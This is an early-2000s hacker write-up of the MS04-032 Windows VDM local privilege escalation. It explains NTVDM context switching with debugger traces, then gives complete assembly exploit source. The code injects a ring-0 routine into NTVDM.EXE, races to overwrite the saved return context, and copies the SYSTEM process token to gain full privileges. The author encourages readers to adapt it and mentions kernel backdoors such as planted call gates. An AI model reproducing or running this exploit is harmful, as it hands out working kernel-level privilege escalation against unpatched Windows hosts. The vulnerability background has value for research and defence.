Disclaimer: There are no warranties, implied or express, with regard to this information. In no event shall the author (me) be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. All credit goes to : Derek Soeder & his eeyes friends for discovering a so beautiful vulnerability (400% fun)!! Needed: - a computer - a brain..(Optional) - a windows :( - knowing the only real language; yea Assembly artistic C0d3 - understanding Intel P-mode (unless a little..) - a good old Soft Ice About: name: - MS04-032 - Windows VDM #UD Local Privilege Escalation Historic: Reported to M$ on March 18, 2004 9 month ago Public Release and patch Release on October 12, 2004 a month ago Now: exploit Release Little fun with M$ ? So read this (from eeye advisory): "[NOTE: This vulnerability was silently fixed by Microsoft in June, approximately 90 days after it was reported, with the release of Windows XP SP2 Release Candidate 2. All other versions of Windows remained unpatched for over 120 additional days.]" [no comment, or just one] The way they are, the way they do... Checked against : -> 2K sp 0,sp 1,sp 2,sp 3 -> XP sp 0, sp 1 -> NT 4 -> 2K3 -->> Reading the original eeye advisorie is highly recommended!!! http://www.eeye.com/html/research/advisories/AD20041012.html <=Schizophrenic Paranoidal sick mind saY=> This story start a month ago while reading another surely technical eeye advisory. What is involved here : Windows provide capabilities to run old 16 bit DOS binary. This compatibility is provided mainly by the Intel P mode that can create 16 Bit virtual machine (V86). The virtual machine (VM aKa VDM (Virtual DOS Machine) ) created when execute old DOS binary or just when running cmd.exe is Mainly composed in 3 parts: -The VM it self -A user land binary that manage the VM called NTVDM.EXE -A Kernel part that manage IO and switch between the VM and NTVDM.EXE The interest part here is the switch mechanism between the IO managing kernel part and the NTVDM.EXE process. A little run flow: *1 16Bit VM get IO input (like keyboard input) *2 16Bit VM handle the input but need more privileges to really use the in/out port; so 16Bit VM code need talk with the 32Bit land where no emulated OS (so real Os, even if it's windo$ !?) live ,so the VM generate an invalid opcode : 0xC4C4 also called "bops". The invalid opcode fault handler then passes the requests to the 32-bit kernel code. The kernel IO handler is the interrupt 6 also called #UD; that is wrapped from the windows syscall interrupt gate 2E. *3 Kernel interrupt then give back control to the user land VDM "host" code (NTVDM.EXE). Well, well this is almost how this mechanism works; Now, how play with this? First we need trigger this event interrupt; a good way to do this is build a little .com binary. So, let's return 9 year back and play a little with good old 16Bit assembly ;) Remember the old DOS int 21 ? if not : INT 21 - DOS 1+ - READ CHARACTER FROM STANDARD INPUT, WITH ECHO AH = 01h Return: AL = character read Notes: ^C/^Break are checked, and INT 23 executed if read ^P toggles the DOS-internal echo-to-printer flag ^Z is not interpreted, thus not causing an EOF if input is redirected character is echoed to standard output standard input is always the keyboard and standard output the screen under DOS 1.x, but they may be redirected under DOS 2+ SeeAlso: AH=06h,AH=07h,AH=08h,AH=0Ah We'll use the readkey function of int 21 because here is an infinite loop for reading keyboard scancode and consequently calling every time interrupt 6. Create the following file : ----------------------file:sc.S---------------------- ---------------------Cut&Paste--------------------- a 100 MOV AX,0100 INT 21 INT 20 r cx 7 ntest.com w q ---------------------Cut&Paste--------------------- Then launch your test.com "compilation" with the command : debug < c:\sc.S Obtaining then a TEST.COM file. You can verify this file by doing the next: C:\>debug TEST.COM -u 0CCF:0100 B80001 MOV AX,0100 0CCF:0103 CD21 INT 21 0CCF:0105 CD20 INT 20 0CCF:0107 65 DB 65 0CCF:0108 207282 AND [BP+SI-7E],DH 0CCF:010B 7065 JO 0172 0CCF:010D 7274 JB 0183 0CCF:010F 6F DB 6F (...) q Practice now. Start SI ; break on int 6 ; and launch the test.com Here we are. Reading the int 6 handler, you can find on it's end : 0008:804662B9 899898000000 MOV [EAX+00000098],EBX 0008:804662BF 898894000000 MOV [EAX+00000094],ECX 0008:804662C5 899090000000 MOV [EAX+00000090],EDX 0008:804662CB 89B08C000000 MOV [EAX+0000008C],ESI 0008:804662D1 0534FDFFFF ADD EAX,FFFFFD34 0008:804662D6 8B98C8000000 MOV EBX,[EAX+000000C8] 0008:804662DC 8BB0C4000000 MOV ESI,[EAX+000000C4] 0008:804662E2 8BB8C0000000 MOV EDI,[EAX+000000C0] 0008:804662E8 8B90BC000000 MOV EDX,[EAX+000000BC] 0008:804662EE 8B88B8000000 MOV ECX,[EAX+000000B8] 0008:804662F4 83EC14 SUB ESP,14 0008:804662F7 895C2410 MOV [ESP+10],EBX 0008:804662FB 8974240C MOV [ESP+0C],ESI 0008:804662FF 897C2408 MOV [ESP+08],EDI 0008:80466303 89542404 MOV [ESP+04],EDX 0008:80466307 890C24 MOV [ESP],ECX 0008:8046630A 8B98A4000000 MOV EBX,[EAX+000000A4] 0008:80466310 8BB0A0000000 MOV ESI,[EAX+000000A0] 0008:80466316 8BB89C000000 MOV EDI,[EAX+0000009C] 0008:8046631C 8BA8B4000000 MOV EBP,[EAX+000000B4] 0008:80466322 8B0D24F1DFFF MOV ECX,[FFDFF124] 0008:80466328 8B4918 MOV ECX,[ECX+18] 0008:8046632B 8B1540F0DFFF MOV EDX,[FFDFF040] 0008:80466331 81E920020000 SUB ECX,00000220 0008:80466337 33C0 XOR EAX,EAX 0008:80466339 894A04 MOV [EDX+04],ECX 0008:8046633C A252F0DFFF MOV [FFDFF052],AL 0008:80466341 BA3B000000 MOV EDX,0000003B 0008:80466346 668EE2 MOV FS,DX 0008:80466349 CF IRETD IRETD return back directly from the windows E8 syscall wrapper (interrupt gate; seem good): 001B:78476078 B8E8000000 MOV EAX,000000E8 001B:7847607D 8D542404 LEA EDX,[ESP+04] 001B:78476081 CD2E INT 2E 001B:78476083 C20800 RET 0008 Here is the context switch between ring 0 and ring 3. 0008:804662D6 8B98C8000000 MOV EBX,[EAX+000000C8] 0008:804662DC 8BB0C4000000 MOV ESI,[EAX+000000C4] 0008:804662E2 8BB8C0000000 MOV EDI,[EAX+000000C0] 0008:804662E8 8B90BC000000 MOV EDX,[EAX+000000BC] 0008:804662EE 8B88B8000000 MOV ECX,[EAX+000000B8] 0008:804662F4 83EC14 SUB ESP,14 0008:804662F7 895C2410 MOV [ESP+10],EBX 0008:804662FB 8974240C MOV [ESP+0C],ESI 0008:804662FF 897C2408 MOV [ESP+08],EDI 0008:80466303 89542404 MOV [ESP+04],EDX 0008:80466307 890C24 MOV [ESP],ECX (...) 0008:80466349 CF IRETD As you can see, context is put in stack from eax+index. But if you take a look at EAX+000000B8 where is stored future CS:EIP, you can see : CS:EIP=0008:80466307 SS:ESP=80010:BEDF5D98 EAX=0F095AE4 EBX=00000023 ECX=78476083 EDX=0000001B ESI=0105FC40 EDI=00000202 EBP=00000000 EFL=00080082 DS=0023 ES=0023 FS=0000 GS=0000 ++>EAX+000000B8 0023:0F095B9C 78476083 0000001B 00000202 0105FC40 .`Gx........@... 0023:0F095BAC 00000023 00000000 00000000 00000000 #............... 0023:0F095BBC 00000000 00000000 00000000 00000000 ................ And as said in original advisory, guess where is mapped 0023:0F095B9C ? Owner Obj Name Obj# Address Size Type ntvdm .text 0001 001B:0F001000 00057591 CODE RO ntvdm .data 0002 0023:0F059000 00045710 IDATA RW ntvdm .rsrc 0003 0023:0F09F000 00002000 IDATA RO Right! ; In the R/W .data section of a simple user land process!!!! So K0m & Pl4y , K0m & Pl4y ... Overwriting the 8 firsts byte at EAX+000000B8 lead to redirect the IRETD where ever you want. 4 first byte are the EIP return adresse; Next 4 byte are the CS selector; here is power; remember that the running Selector's DPL define processor's privileges level. Sel. Type Base Limit DPL Attributes GDTbase=80036000 Limit=03FF 0008 Code32 00000000 FFFFFFFF 0 P RE 0010 Data32 00000000 FFFFFFFF 0 P RW 001B Code32 00000000 FFFFFFFF 3 P RE 0023 Data32 00000000 FFFFFFFF 3 P RW In normal a run time the future CS is 0000001B; DPL 3 show that is a return back of the interrupt gate. Well Well Time to C0de Yea, that's it; you've seen it too :) If future CS keep being 8 and EIP the point to your code, you 0wn the kernel, and keep ring 0!!! The only thing we have to do then is to map our code into the NTVDM.EXE virtual space and overwrite the 8 byte to point on it. When keeping CS to the ring 0 selector you retain the kernel right; but what can we do here ?? As said Derek Soeder (advisory author), if you don't know, just see www.rootkit.com :)) Ok, you can here do many interesting thing, like install your own call gate on GDT //interrupt gate on IDT and so other backdooring toys...(scheduler hooking play m0re) Exploit : For the proof of Concept I’ll just get the SYSTEM privileges and return back to userland... But you can easily adjust this to own purpose.. To get SYSTEM privileges we just steal the privileges token of the system process... (Technique already used on the Norton AntiVirus driver exploit...) Just scan all _EPROCESS kernel object by following the ActiveProcessLinks doubly-linked list (0xa0). Localize system process with its PID (0x9c) then take this cheerful token (0x12c). (Offset here are 2K one's) kd> dt _EPROCESS +0x000 Pcb : _KPROCESS +0x06c ExitStatus : Int4B +0x070 LockEvent : _KEVENT +0x080 LockCount : Uint4B +0x088 CreateTime : _LARGE_INTEGER +0x090 ExitTime : _LARGE_INTEGER +0x098 LockOwner : Ptr32 _KTHREAD +0x09c UniqueProcessId : Ptr32 Void +0x0a0 ActiveProcessLinks : _LIST_ENTRY +0x0a8 QuotaPeakPoolUsage : [2] Uint4B +0x0b0 QuotaPoolUsage : [2] Uint4B +0x0b8 PagefileUsage : Uint4B +0x0bc CommitCharge : Uint4B +0x0c0 PeakPagefileUsage : Uint4B +0x0c4 PeakVirtualSize : Uint4B +0x0c8 VirtualSize : Uint4B +0x0d0 Vm : _MMSUPPORT +0x118 SessionProcessLinks : _LIST_ENTRY +0x120 DebugPort : Ptr32 Void +0x124 ExceptionPort : Ptr32 Void +0x128 ObjectTable : Ptr32 _HANDLE_TABLE +0x12c Token : Ptr32 Void +0x130 WorkingSetLock : _FAST_MUTEX +0x150 WorkingSetPage : Uint4B +0x154 ProcessOutswapEnabled : UChar +0x155 ProcessOutswapped : UChar +0x156 AddressSpaceInitialized : UChar +0x157 AddressSpaceDeleted : UChar +0x158 AddressCreationLock : _FAST_MUTEX +0x178 HyperSpaceLock : Uint4B +0x17c ForkInProgress : Ptr32 _ETHREAD +0x180 VmOperation : Uint2B +0x182 ForkWasSuccessful : UChar +0x183 MmAgressiveWsTrimMask : UChar +0x184 VmOperationEvent : Ptr32 _KEVENT +0x188 PaeTop : Ptr32 Void +0x18c LastFaultCount : Uint4B +0x190 ModifiedPageCount : Uint4B +0x194 VadRoot : Ptr32 Void +0x198 VadHint : Ptr32 Void +0x19c CloneRoot : Ptr32 Void +0x1a0 NumberOfPrivatePages : Uint4B +0x1a4 NumberOfLockedPages : Uint4B +0x1a8 NextPageColor : Uint2B +0x1aa ExitProcessCalled : UChar +0x1ab CreateProcessReported : UChar +0x1ac SectionHandle : Ptr32 Void +0x1b0 Peb : Ptr32 _PEB +0x1b4 SectionBaseAddress : Ptr32 Void +0x1b8 QuotaBlock : Ptr32 _EPROCESS_QUOTA_BLOCK +0x1bc LastThreadExitStatus : Int4B +0x1c0 WorkingSetWatch : Ptr32 _PAGEFAULT_HISTORY +0x1c4 Win32WindowStation : Ptr32 Void +0x1c8 InheritedFromUniqueProcessId : Ptr32 Void +0x1cc GrantedAccess : Uint4B +0x1d0 DefaultHardErrorProcessing : Uint4B +0x1d4 LdtInformation : Ptr32 Void +0x1d8 VadFreeHint : Ptr32 Void +0x1dc VdmObjects : Ptr32 Void +0x1e0 DeviceMap : Ptr32 Void +0x1e4 SessionId : Uint4B +0x1e8 PhysicalVadList : _LIST_ENTRY +0x1f0 PageDirectoryPte : _HARDWARE_PTE_X86 +0x1f0 Filler : Uint8B +0x1f8 PaePageDirectoryPage : Uint4B +0x1fc ImageFileName : [16] UChar (it's name..) +0x20c VmTrimFaultValue : Uint4B +0x210 SetTimerResolution : UChar +0x211 PriorityClass : UChar +0x212 SubSystemMinorVersion : UChar +0x213 SubSystemMajorVersion : UChar +0x212 SubSystemVersion : Uint2B +0x214 Win32Process : Ptr32 Void +0x218 Job : Ptr32 _EJOB +0x21c JobStatus : Uint4B +0x220 JobLinks : _LIST_ENTRY +0x228 LockedPagesList : Ptr32 Void +0x22c SecurityPort : Ptr32 Void +0x230 Wow64Process : Ptr32 _WOW64_PROCESS +0x238 ReadOperationCount : _LARGE_INTEGER +0x240 WriteOperationCount : _LARGE_INTEGER +0x248 OtherOperationCount : _LARGE_INTEGER +0x250 ReadTransferCount : _LARGE_INTEGER +0x258 WriteTransferCount : _LARGE_INTEGER +0x260 OtherTransferCount : _LARGE_INTEGER +0x268 CommitChargeLimit : Uint4B +0x26c CommitChargePeak : Uint4B +0x270 ThreadListHead : _LIST_ENTRY +0x278 VadPhysicalPagesBitMap : Ptr32 _RTL_BITMAP +0x27c VadPhysicalPages : Uint4B +0x280 AweLock : Uint4B +0x284 pImageFileName : Ptr32 _UNICODE_STRING Found with the M$ kernel debugger... Yea i know what you think; Soft Ice is a kernel debugger but M$ kernel debugger is ...(no comment) But fuck it anyway, on close sources reversing, symbol resolving is useful, and M$ KD do it fine. (note:M$ KD combined with sysinternal LiveKD can be a really useful combo on a production system for another reason : U get a K.D. without reboot..) Exploit Code: First we need to take the kernel version. Once it's done, for each version set the OS specific offset of _EPROCESS PID, token & ActiveProcessLinks entry and also the default system process PID. But not only; to overwrite context in NTVDM.EXE we need to locate its offset. Since the normal return address in this context is located in a kernel syscall wrapper; This address is constant for each kernel version. So is the base address of the NTVDM.EXE process. Here is the ID, I make really dirty scan to find context offset; initiate this scan with dependant OS value. (The base address of NTVDM and the return context address as pattern). Once VM context localized, exploit inject its ring0 procedure into NTVDM virtual space. (Injection code without debug token, Ripped from Great article Win2k.SFPDisable/29A-6 by Benny/29A and Ratter/29A). Then start a little thread bomber that will force context overwriting into NTVDM.EXE. To view when overwrite is triggered; you can use Soft Ice conditional BPX: BPX 0008:80466307 IF ECX!=78476083 (Adjust value to your own kernel) Once it is overwritten the IRETD will return in the injected ring0 procedure where we get the system token as explained previously. Then return back to user land with our own IRETD. Game is now 0ver. C0de : Enjoy it! ;############################################START############################################ ;############################################################################################ ;******************************************************************************************** ;******************************************************************************************** ; CopyLeft (c) 2004-2058 aluc4rd@psycho-hazard.net Security eXPERImENTal Research. All Rights Reserved. ; THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" ; AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION ; WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. ;******************************************************************************************** ;**********************************************Make.bat************************************** ;C:\TASM\BIN\tasm32 /ml test.asm ;C:\TASM\BIN\tlink32 /Tpe /aa test.obj,,,C:\TASM\LIB\import32.lib psapi kernel32 ;pause ;******************************************************************************************** ;******************************************************************************************** .386P locals jumps .model flat,STDCALL include win32api.inc include useful.inc include mz.inc include pe.inc extrn OpenProcess:PROC extrn TerminateProcess:PROC invoke macro api ;macro for API callz extrn api:PROC ;declare API call api ;call it... endm PROCESS_TERMINATE EQU 0001h NORMAL_PRIORITY_CLASS EQU 000000020h IDLE_PRIORITY_CLASS EQU 000000040h HIGH_PRIORITY_CLASS EQU 000000080h ;BELOW_NORMAL_PRIORITY_CLASS EQU 0x00004000 ;ABOVE_NORMAL_PRIORITY_CLASS EQU 0x00008000 .data txt1 db "<~~29A~~>",0 txt2 db "VDM X-pl01T (2004)",00Dh,0Ah,00Dh,0Ah db "aluc4rd@psycho-hazard.net",0 txt3 db "Err0R",0 @startupinfo dd 0 ; size of startup info-structure db 68 dup (0) hprocess dd ? ; Process Info Structure test db "test.com",0 ThreadId dd 0 ver dd 027h dup (0) .code start: mov dword ptr [offset ver],09ch push offset ver invoke GetVersionExA cmp dword ptr [offset ver+4],4 jne nonnt4 mov dword ptr [offset sysPID],02 mov dword ptr [offset @nxt],098h mov dword ptr [offset @pid],094h ;NT4 mov dword ptr [offset @token],0108h jmp finver nonnt4: cmp dword ptr [offset ver+4],5 jne errr cmp dword ptr [offset ver+8],0 jne non2k mov dword ptr [offset sysPID],08 mov dword ptr [offset @nxt],0a0h mov dword ptr [offset @pid],09ch ;2000 mov dword ptr [offset @token],012ch jmp finver non2k: cmp dword ptr [offset ver+8],1 jne nonXP mov dword ptr [offset sysPID],04 mov dword ptr [offset @nxt],088h mov dword ptr [offset @pid],084h ;XP mov dword ptr [offset @token],0c8h jmp finver nonXP: cmp dword ptr [offset ver+8],2 jne errr ;Donc 2K3 mov dword ptr [offset sysPID],04 mov dword ptr [offset @nxt],088h mov dword ptr [offset @pid],084h ;2003 mov dword ptr [offset @token],0c8h finver: ;######################################################################################### ;########################################INIT D0NE######################################## ;######################################################################################### push 0 push offset txt1 push offset txt2 push 0 invoke MessageBoxA ; welc0me push offset hprocess ; Points to buffer that stores the hprocess info push offset @startupinfo ; Points to buffer that stores the startup info push 0 ; NULL push 0 ; NULL push IDLE_PRIORITY_CLASS ; Access we will have over the process. push 0 ; NULL push 0 ; NULL push 0 ; NULL push 0 ; NULL push offset test ; Pointer to EXE name that will be opened. invoke CreateProcessA ; Open the process.... push 850 invoke Sleep ;######################################################################################### ;########################################VDM CREATED###################################### ;######################################################################################### cmp dword ptr [offset ver+4],4 ;NT je scan16 cmp dword ptr [offset ver+8],0 ;2000 je scan16 mov ecx,0ffffh dec ecx dec ecx dec ecx dec ecx cmp dword ptr [offset ver+8],1 jne azerty mov esi,002750000h ;XP VDM Base jmp azerty2 azerty: mov esi,001750000h ;2003 VDM Base azerty2: next32: push ecx push esi push 0 push 4 push offset buff push esi push hprocess invoke ReadProcessMemory pop esi cmp dword ptr [buff],07FFE0304h je OK32 ;XP & 2003 pattern inc esi pop ecx loop next32 ;[32 Bit lame scan] errr: push 0 push offset txt3 push offset txt3 push 0 invoke MessageBoxA push dword ptr 0 invoke ExitProcess scan16: mov ecx,0457b0h dec ecx dec ecx mov esi,00f059000h ;NT//2K VDM Base next16: push ecx push esi push 0 push 2 push offset buff push esi push hprocess invoke ReadProcessMemory pop esi cmp dword ptr [offset ver+4],4 jne nolabel cmp word ptr [buff],077F7h ;NT pattern je OK jmp nolabel2 nolabel: cmp word ptr [buff],07846h ;2K pattern je OK cmp word ptr [buff],07847h je OK nolabel2: inc esi pop ecx loop next16 ;[16 Bit lame scan] jmp errr OK: dec esi dec esi ;16Bit scan , 32Bit PTR, need allign... OK32: pop ecx ;######################################################################################### ;########################################SCAN D0NE######################################## ;######################################################################################### mov dword ptr [addr],esi mov eax,fs:[020h] mov [hnd],eax lea eax,dword ptr TerminateProcess inc eax inc eax mov eax,[eax] mov eax,[eax] mov [@TerminateProcess],eax lea eax,dword ptr OpenProcess inc eax inc eax mov eax,[eax] mov eax,[eax] mov [@OpenProcess],eax lea eax,dword ptr MessageBoxA inc eax inc eax mov eax,[eax] mov eax,[eax] mov [@MessageBoxA],eax lea eax,dword ptr ExitProcess inc eax inc eax mov eax,[eax] mov eax,[eax] mov [@ExitProcess],eax ;######################################################################################### ;########################################RELOGEMENT D0NE################################## ;######################################################################################### push PAGE_READWRITE push MEM_RESERVE or MEM_COMMIT push end_rroutine-start_rroutine push 0 push hprocess invoke VirtualAllocEx ;alloc there memory xchg eax,ebx push ebx push 0 push end_rroutine-start_rroutine push offset start_rroutine push ebx push hprocess invoke WriteProcessMemory ;write there our code pop ebx ;######################################################################################### ;########################################INJECTION D0NE################################### ;######################################################################################### mov eax,0aaaaaaaah mov dword ptr [buff],ebx ;eax mov eax,08h; ;08h ;01bh mov dword ptr [buff+4],eax mov ecx,5000 thr: push ecx push offset ThreadId ; lpThreadId push 0 ; HIGH_PRIORITY_CLASS dwCreationFlags push 0 ; lpParameter push offset fork ; lpStartAddress push 0 ; dwStackSize push 0 ; lpThreadAttributes invoke CreateThread push 1 invoke Sleep pop ecx loop thr ;######################################################################################### ;########################################THREAD B0MBER#################################### ;######################################################################################### push dword ptr 0 invoke ExitProcess ;end; quit ;######################################################################################### ;########################################THREAD########################################### ;######################################################################################### fork: mov ecx,2000 re: push ecx push 0 push 8 push offset buff push dword ptr [addr] push hprocess invoke WriteProcessMemory push 1 invoke Sleep pop ecx loop re push 0 invoke ExitThread .data addr dd 0 buff dd 0 buff2 dd 0 ;######################################################################################### ;########################################RING 0 PROC###################################### ;######################################################################################### .data start_rroutine Proc ;(here the smily opcode;) ) mov eax,cr0 ;RING 0 HERE!!!!!!!!!!!!!!! && FUCK M$ push 030h ;need kernel fs to browse kernel obj pop fs mov eax,fs:[0124h] mov esi,[eax+044h] mov eax,esi search: mov ecx,012345678h @nxt = dword ptr $-4 mov eax,[eax+ecx] sub eax,ecx mov ebx,012345678h sysPID = dword ptr $-4 mov ecx,012345678h @pid = dword ptr $-4 add ecx,eax cmp [ecx],ebx jne search mov ecx,012345678h @token = dword ptr $-4 mov eax,[eax+ecx] mov [esi+ecx],eax ;R00T N0W ... push 03Bh pop fs ;restore user fs jmp back_to user_land: pop eax push 0202h ; keep eflag (with Pmode..) push 01bh push eax iretd back_to: call user_land push 012345678h hnd = dword ptr $-4 push 0 push PROCESS_TERMINATE mov eax,012345678h @OpenProcess = dword ptr $-4 call eax push 0 push eax mov eax,012345678h @TerminateProcess = dword ptr $-4 call eax push 0 call rien db "<~~29A~~>",0 rien: call rien2 db "R00T3D",0 rien2: push 0 mov eax,012345678h @MessageBoxA = dword ptr $-4 call eax push 0 mov eax,012345678h @ExitProcess = dword ptr $-4 call eax end_rroutine: start_rroutine EndP ends end start ;############################################STOP############################################ ;############################################################################################ By aluc4rd@psycho-hazard.net Keep Knowledge free A1uc4rd K33p Pl4Y ~~ K33p C0de